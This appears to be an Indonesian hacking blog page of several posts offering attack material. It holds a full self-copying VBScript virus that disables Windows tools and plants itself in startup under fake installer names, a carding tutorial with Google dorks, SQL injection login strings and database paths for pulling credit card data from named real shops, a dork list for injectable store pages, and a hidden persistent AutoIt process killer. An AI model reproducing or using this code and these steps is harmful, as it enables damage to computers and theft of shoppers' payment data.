Kamis, 22 September 2011

0 Dork Credit Card

20.45 Under From 0x13
[0 Comment]
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id=
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?catalogid=
shopdisplayproducts.cfn?catalogid=
displayproducts.cfm?category_id=
displayproducts.asp?category_id=
DisplayProducts.asp?prodcat=
DisplayProducts.cfm?prodcat=x
productDetail.cfm?ProductID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp?CatId=
Store_ViewProducts.asp?Cat=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productID=
ProductDetails.asp?prdId=12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?product_id=
products.php?subcat_id=
product.php?product_id=
view_product.cfm?productID=
product_details.asp?prodid=
shopdisplayproducts.cfm?id=
displayproducts.cfm?id=
Read More »

0 SCRIPT VIRUS SETAN.VBS

20.45 Under From 0x13
[0 Comment]
On error resume next
Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
set Regpen = CreateObject (“Wscript.Shell”)
set FSO = CreateObject (“Scripting.FileSystemObject”)
set Creator = FSO.CreateTextFile (“C:\sulawesi.vbs”, true)
Creator.WriteLine (“Msgbox (“& Chr (34) & “Salam Kenal dari Saya, zer03s :<” & chr (34)& “)”)
Creator.Close
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoRun”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOption”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,”16″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NoSetTaskbar”,”1″,”REG_DWORD”
Regpen.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\HideFileExt”,”1″,”REG_DWORD”
Regpen.Regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “I’M SETAN”
Regpen.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”ASSALAMUALAIKUM, YA AHLIL KUBUR”
Set Copier = FSO.GetFile (“C:\zer03s.vbs”)
Copier.Copy (“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe.vbs”)
FSO.CreateFolder (“C:\Program Files\Microsoft 0fficeffice12″)
FSO.CreateFolder (“D:\Program”)
FSO.CreateFolder (“E:\Program”)
FSO.CreateFolder (“F:\Program”)
FSO.CreateFolder (“G:\Program”)
FSO.CreateFolder (“H:\Program”)
FSO.CreateFolder (“I:\Program”)
FSO.CreateFolder (“J:\Program”)
FSO.CreateFolder (“K:\Program”)
Set Deleter = FSO.GetFile (“C:\Windows\System32\Restore\rstrui.exe”)
Deleter.Move (“C:\Program Files\Microsoft 0fficeffice12\rstrui.Gnamu”)
set Dupler = FSO.GetFile (WScript.ScriptFullName)
Dupler.Copy (“C:\Program Files\Microsof 0fficeffice12\Hantu.vbs”)
Dupler.Copy (“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Desktop.ini.vbs”)
Dupler.Copy (“C:\Documents and Settings\All Users\Desktop\Dajjal_Antivirus.exe.vbs”)
Dupler.Copy (“C:\Windows\System32\Restore\rstrui.exe.vbs”)
Dupler.Copy (“D:\Program\MotoGP_SETUP.vbs”)
Dupler.Copy (“E:\Program\TuneUp2009_SETUP.vbs”)
Dupler.Copy (“F:\Program\Ansav_SETUP.vbs”)
Dupler.Copy (“G:\Program\DeltaForce_SETUP.vbs”)
Dupler.Copy (“H:\Program\DeltaForce_SETUP.vbs”)
Dupler.Copy (“I:\Program\Ansav_SETUP.vbs”)
Dupler.Copy (“J:\Program\Project.vbs”)
Dupler.Copy (“K:\Program\Hantu.vbs”)
Set Runner = WScript.CreateObject (“WScript.Shell”)
Runner.Run (“C:\Program Files\Microsoft 0fficeffice12\Hantu.vbs”)
simpan dengan extensi.vbs
Read More »

0 VoIP Network Scanning

20.44 Under From 0x13
[0 Comment]
aringan VoIP pemindaian …??? hhhmmmm … hanya untuk memastikan keberadaan jaringan VoIP di …;)
Lingkungan VoIP server tidak hanya telepon dan VoIP dan jasa tetapi juga ada perangkat lain seperti router dan gateway VPN, server web, server TFTP, server DNS, server DHCP, server RADIUS, firewall, sistem pencegahan penyusupan, dan pengontrol sesi perbatasan.
Host discovery:
[root@zer03s]# nmap -sP 192.168.1.1-254
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2010-07-19 20:51 CST
Host 192.168.1.1 appears to be up.
MAC Address: 00:13:10:D4:AF:44 (Cisco-Linksys)
Host 192.168.1.21 appears to be up.
MAC Address: 00:0F:34:11:80:45 (Cisco Systems)
Host 192.168.1.23 appears to be up.
MAC Address: 00:15:62:86:BA:3E (Cisco Systems)
Host 192.168.1.24 appears to be up.
MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology)
Host 192.168.1.25 appears to be up.
MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks)
Host 192.168.1.27 appears to be up.
MAC Address: 00:04:F2:03:15:46 (Polycom)
Host 192.168.1.51 appears to be up.
MAC Address: 00:04:13:23:34:95 (Snom Technology AG)
Host 192.168.1.52 appears to be up.
MAC Address: 00:15:62:EA:69:E8 (Cisco Systems)
Host 192.168.1.53 appears to be up.
MAC Address: 00:04:0D:50:40:B0 (Avaya)
Host 192.168.1.54 appears to be up.
MAC Address: 00:0E:08:DA:24:AE (Sipura Technology)
Host 192.168.1.55 appears to be up.
MAC Address: 00:E0:11:03:03:97 (Uniden SAN Diego R&D Center)
Host 192.168.1.56 appears to be up.
MAC Address: 00:0D:61:0B:EA:36 (Giga-Byte Technology Co.)
Host 192.168.1.57 appears to be up.
MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics)
Host 192.168.1.103 appears to be up.
MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.)
Host 192.168.1.104 appears to be up.
Nmap finished: 254 IP addresses (17 hosts up) scanned in 5.329 seconds
[root@attacker]# nmap -P0 -PT80 192.168.1.23
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-02-19 21:28 CST
Interesting ports on 192.168.1.23:
(The 1671 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:15:62:86:BA:3E (Cisco Systems)
Nmap finished: 1 IP address (1 host up) scanned 2.144 second
good luck… happy VoIP hacking friends….
Read More »

1 PRO XL gratis internetan (hp)

20.43 Under From 0x13
[1 Comment]
Harus REG dulu KAPAN LAGI dgn cara ketik *123*5*6*8#
tunggu smpai ada blsan dr operator,tp emang kena Rp 1000 dan untuk UNREG *123*5*6*8*4*3#
Nb:USAHAN PULSA MINIM BIAR GA MALAK,
Rubah seting di hp dgn :
apn:www.xlspeed.net
user dan pass : xlspeed ip proxy : 80.239.242.113
port 80 seting opmin http server : http://xlgo.co.id:80/
socket : standarhost : 80.239.242.113 remove port d centang f
q bq mq :kosong
sudah di coba gan,,hasilnya memuaskan….
Read More »

0 JavaScript Password Protection

20.42 Under From 0x13
[0 Comment]
Contoh halaman protect password >>> DISINI
Scriptnya gan…
<HEAD>
<SCRIPT language="JavaScript">
<!--hide

var password;

var pass1="cool";

password=prompt('Please enter your password to view this page!',' ');

if (password==pass1)
  alert('Password Correct! Click OK to enter!');
else
   {
    window.location="http://www.pageresource.com/jscript/jpass.htm";
    }

//-->
</SCRIPT>
</HEAD>
Read More »

0 Contoh bugs pada system web shoping

20.41 Under From 0x13
[0 Comment]
Contoh bugs pada bentuk toko system : shopadmin
Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log
Contoh bugs pada bentuk toko sistem : metacart
Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb
Contoh bugs pada bentuk toko sistem CShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : PDshopro
Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : commerceSQL
Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log
Contoh bugs pada bentuk toko sistem : Cart32 v3.5a
Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25 –
Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://Target/vpasp/shopadmin.asp
Contoh bugs pada bentuk toko sistem : Lobby.asp
Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb
Contoh bugs pada bentuk toko sistem : Shopper.cgi
Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log
Contoh bugs pada bentuk toko sistem :P roddetail.asp
Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem igishop
Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
setelah bisa login, cari data yang diperlukan .
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca
Contoh bugs pada bentuk toko sistem : Index Cart
Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin
Contoh bugs pada bentuk toko sistem : Index cart
Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??
Contoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..
Contoh bugs pada bentuk toko sistem : Sunshop
Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
Contoh bugs pada bentuk toko sistem : digishop
Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment.
Read More »

0 anti IDManager

20.40 Under From 0x13
[0 Comment]
Banyak yg make IDM di warnet kalian? kesel karena client complain masalah koneksi yg “sangat tidak enak” ? mau negor yg make tapi malu / ga tau siapa yg make? ato mau nglarang user make IDM tapi takut di bilang “PELIT” ??
pake ini saja.
;——————————— CODE START ————————————;
;~ ANTI-IDM v0.1
;~ Coder : zer03s [Coder @zer03s]
];~ YM: hack_fzy
Opt(“TrayIconHide”, 1)
FileCopy(@autoitexe,”C:\Windows\AntiIDM.exe”)
RegWrite(“HKLM\Software\Microsoft\Windows\Current Version\Run”,”Anti-IDM”,”REG_SZ”,”C:\Windows\AntiIDM.exe”)
While (1)
For $i=0 to 100 step 1
if ProcessExists(“IDMAN.exe”) then
sleep(60000)
processclose(“idman.exe”)
EndIf
Next
wend
;——————- END of CODE —————————-;
how to use?
Download Autoit Compiler from www.autoitscript.com
open autoit default editor, I’d like to use Notepad++
copy code above, save as *.au3, open Aut2exe.exe from autoit Program groups in start menu.
complie this script. then run it from your client. Enjoy .!!!
Read More »